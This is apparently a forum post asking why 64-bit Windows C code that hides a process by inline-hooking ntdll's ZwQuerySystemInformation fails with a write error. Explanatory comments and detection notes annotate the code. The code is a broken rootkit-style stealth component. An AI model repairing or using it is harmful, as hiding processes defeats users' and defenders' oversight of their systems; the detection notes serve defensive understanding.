进程隐藏,下面代码总是出写入错误。我感觉是FunHook函数有问题,有没有什么问题呀?


```c

// Installs an inline patch on the exported function OldFunName of module
// szModule: the first 9 bytes of the export's prologue are copied into
// OldData, then overwritten with the 9 bytes of NewData (byte 0 = 0xe9,
// bytes 1..8 = dwRelative). Returns TRUE on success, FALSE when the export's
// first byte is already 0xe9, when the export cannot be resolved, or when
// either data buffer is NULL.
// Defender note: this is the pattern a user-mode integrity check detects —
// compare the in-memory prologue of ntdll exports with the on-disk image; the
// function's own first-byte test below is a minimal form of that comparison.
BOOL FunHook(LPCSTR OldFunName,LPVOID lpNewFun,PBYTE OldData,PBYTE NewData,LPCWSTR szModule)
{
    DWORD dwProtect;          // previous page protection, restored at the end
    LONGLONG dwRelative;      // 8-byte value stored at NewData+1
    byte pbuf[9]={0xe9,0,};   // not referenced anywhere in this function
    PBYTE pByte;              // byte view of the resolved export
    // Resolve the export; the variable name assumes ZwQuerySystemInformation,
    // but any export name can be passed in OldFunName.
    LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(szModule),OldFunName);
    pByte=(PBYTE)lpZwQuerySystemInformation;
    // Already-patched check: refuse if the first byte is a 0xe9 opcode.
    if (pByte[0]==0xe9)
    {
        MESSAGEBOX(L"The Fun has been hooked!");
        return FALSE;
    }
    if (!lpZwQuerySystemInformation)
    {
        MESSAGEBOX(L"Fun Hook Failed");
        return FALSE;
    }
    if (!NewData||!OldData){MESSAGEBOX(L"Data parameter transmission error!");return FALSE;}
    // Make the 9 target bytes writable; the BOOL result is not inspected.
    VirtualProtect(lpZwQuerySystemInformation,9,PAGE_EXECUTE_READWRITE,&dwProtect);
    MESSAGEBOX(L"VirtualProtect ");
    memcpy(OldData,pByte,9);   // keep the original prologue bytes for the caller
    NewData[0]=0xe9;
    dwRelative=(LONGLONG)lpNewFun-(LONGLONG)OldFunName+9;
    memcpy(NewData+1,&dwRelative,8);
    memcpy(pByte,NewData,9);   // the write to the export's prologue
    // Restore the previous protection; result again not inspected.
    VirtualProtect(lpZwQuerySystemInformation,9,dwProtect,&dwProtect);
    MESSAGEBOX(L"VirtualProtect Finished");
    return TRUE;
}
// Replacement for ntdll!ZwQuerySystemInformation. It removes the hook,
// queries the real function for SystemProcessesAndThreadsInformation into a
// private buffer, unlinks the entry whose UniqueProcessId equals the global
// dwProcessid (defined outside this page) by editing NextEntryOffset, frees
// the buffer, re-installs the hook and returns the last NTSTATUS obtained.
// The SystemInformationClass, SystemInformation, SystemInfoemationLength and
// ReturnLength parameters are not referenced anywhere in this body.
// Defender note: a user-mode prologue patch only affects callers inside the
// patched process; enumeration from another vantage point (a different
// process, kernel-mode callbacks, ETW) is unaffected, which is the basis of
// cross-view detection of hidden processes.
NTSTATUS NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                     PVOID SystemInformation,
                                     ULONG SystemInfoemationLength,
                                     PULONG ReturnLength) // replacement function
{
    NTSTATUS status;
    DWORD dwSizeNeed;   // byte count reported by the size-probe call below
    LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(L"ntdll.dll"),"ZwQuerySystemInformation");
    // FunUnhook and lpOldData/lpNewData are not shown on this page;
    // presumably FunUnhook restores the bytes FunHook saved — confirm.
    status=FunUnhook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,L"ntdll.dll");
    // Size probe: NULL buffer and length 0, required size returned in dwSizeNeed.
    status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,NULL,0,&dwSizeNeed);
    if (status==0xc0000004)   // STATUS_INFO_LENGTH_MISMATCH
    {
        MESSAGEBOX(L"进入if (status==0xc0000004)");
        PSYSTEM_PROCESS_INFORMATION proar,pforward;   // current entry / entry before it
        BYTE *buffer=new BYTE[dwSizeNeed];
        status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,(PVOID)buffer,dwSizeNeed,NULL);
        if (status==0)
        {
            proar = (PSYSTEM_PROCESS_INFORMATION)buffer;
            // Walk the NextEntryOffset-linked list inside the private buffer.
            do {  
                proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
                // UniqueProcessId is truncated to DWORD before the comparison.
                if ((DWORD)proar->UniqueProcessId==dwProcessid)
                {
                    // Make the previous entry point past this one (or end the list).
                    if (proar->NextEntryOffset==0)
                    {
                        pforward->NextEntryOffset=0;
                    }else
                    {
                        pforward->NextEntryOffset+=proar->NextEntryOffset;
                    }
                }
                pforward=proar;
                if (proar->NextEntryOffset==0)
                {
                    break;
                }
                proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
            } while ( proar->NextEntryOffset != 0 );
        }
        delete []buffer;   // the edited copy is discarded here
        buffer=NULL;
    }
    // Re-install the patch before returning to the caller.
    FunHook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,lpNewData,L"ntdll.dll");
    return status;
}

```

以上是64位程序,不是32位